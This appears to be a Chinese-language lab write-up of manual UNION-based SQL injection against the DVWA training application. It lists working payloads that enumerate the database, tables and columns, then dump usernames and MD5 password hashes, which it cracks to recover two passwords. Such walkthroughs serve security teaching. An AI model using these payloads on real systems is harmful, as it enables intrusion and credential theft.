输入1',提示:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 可知SQL语句大概为select * form XXX where ID = '输入';为字符型漏洞。
order by结果为2
查数据库名: -1' union select database(),2#
结果为:First name: dvwa
Surname: 2
查表名(挨个查):
查第一个: -1' union select (select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),2#
结果为:First name: guestbook
Surname: 2
查第二个: -1' union select (select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2#
结果为:First name: users
Surname: 2
查表名(一次查完): -1' union select (select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),2#
结果为:First name: guestbook,users
Surname: 2
查users字段名: -1' union select (select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),2#
结果为:First name:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
Surname: 2
查users表中字段user的中数据: -1' union select (select group_concat(user) COLLATE utf8_general_ci from dvwa.users),2#
结果为:First name: admin,gordonb,1337,pablo,smithy
Surname: 2
查users表字段password的中数据: -1' union select (select group_concat(password) COLLATE utf8_general_ci from dvwa.users),2#
结果为:First name: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99
Surname: 2
综上,通过MD5解密,可知admin的密码为:password、gordonb的密码为:abc123
如果出现提示:Illegal mix of collations for operation 'UNION' 说明存在编码问题,在sql语句from前添加COLLATE utf8_general_ci即可
Md5解密网:www.somd5.com/
